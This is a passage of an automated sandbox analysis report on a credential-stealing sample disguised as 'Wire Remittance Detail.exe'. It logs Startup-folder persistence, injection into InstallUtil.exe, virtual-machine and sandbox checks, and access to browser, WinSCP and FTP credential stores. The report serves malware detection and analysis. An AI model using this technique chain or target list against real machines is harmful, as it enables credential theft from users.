Source: AssemblyFullName.exe.0.dr | Static PE information: section name: .text entropy: 7.992784525923971
Source: C:\Users\user\Desktop\Wire Remittance Detail.exe | File created: C:\Users\user\AppData\Roaming\AssemblyFullName.exe

Boot Survival

Source: C:\Users\user\Desktop\Wire Remittance Detail.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AssemblyFullName.vbs
Source: C:\Users\user\Desktop\Wire Remittance Detail.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    Source: Yara match File source: Process Memory Space: Wire Remittance Detail.exe PID: 6892, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: AssemblyFullName.exe PID: 6916, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: Wire Remittance Detail.exe, 00000000.00000002.1083367719.0000000003041000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1226380633.0000000003112000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exe Memory allocated: 3010000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exe Memory allocated: 3040000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exe Memory allocated: 5040000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 14F0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 30B0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2F30000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe Memory allocated: 2E50000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe Memory allocated: 30E0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: EE0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 29B0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 26F0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 2241
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 7582
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 2012
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 7806
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604 Thread sleep count: 33 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604 Thread sleep time: -30437127721620741s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604 Thread sleep time: -100000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4604 Thread sleep time: -99875s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4036 Thread sleep count: 2241 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4036 Thread sleep count: 7582 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532 Thread sleep count: 31 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532 Thread sleep time: -28592453314249787s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532 Thread sleep time: -100000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2532 Thread sleep time: -99875s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2684 Thread sleep count: 2012 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2684 Thread sleep count: 7806 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99438Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99313Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99204Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99079Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98954Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98829Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98704Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98579Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98414Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98281Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98167Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98062Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97938Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97813Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97688Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97563Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97344Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97219Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 93985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 93860Jump to behavior
                    Source: AssemblyFullName.exe, 00000005.00000002.1226380633.0000000003112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
                    Source: wscript.exe, 00000003.00000003.1213273569.000001C889D13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: AssemblyFullName.exe, 00000005.00000002.1226380633.0000000003112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                    Source: wscript.exe, 00000003.00000003.1213273569.000001C889D13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}^$
                    Source: InstallUtil.exe, 00000006.00000002.2329364960.0000000005CFF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: InstallUtil.exe, 00000002.00000002.1241030016.0000000006192000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll88
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 621008
Source: C:\Users\user\Desktop\Wire Remittance Detail.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Roaming\AssemblyFullName.exe "C:\Users\user\AppData\Roaming\AssemblyFullName.exe"
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\Wire Remittance Detail.exe | Queries volume information: C:\Users\user\Desktop\Wire Remittance Detail.exe VolumeInformation
Source: C:\Users\user\Desktop\Wire Remittance Detail.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Wire Remittance Detail.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Queries volume information: C:\Users\user\AppData\Roaming\AssemblyFullName.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Wire Remittance Detail.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match | File source: 0.2.Wire Remittance Detail.exe.44aee70.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.AssemblyFullName.exe.4337120.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.AssemblyFullName.exe.4337120.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Wire Remittance Detail.exe.44aee70.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.1252075930.0000000004322000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2318499009.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1228824034.000000000312C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1101766073.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2318499009.0000000002A2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1223807451.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1228824034.0000000003101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Wire Remittance Detail.exe PID: 6892, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 6236, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: AssemblyFullName.exe PID: 6916, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 7136, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\FTP Navigator\Ftplist.txt
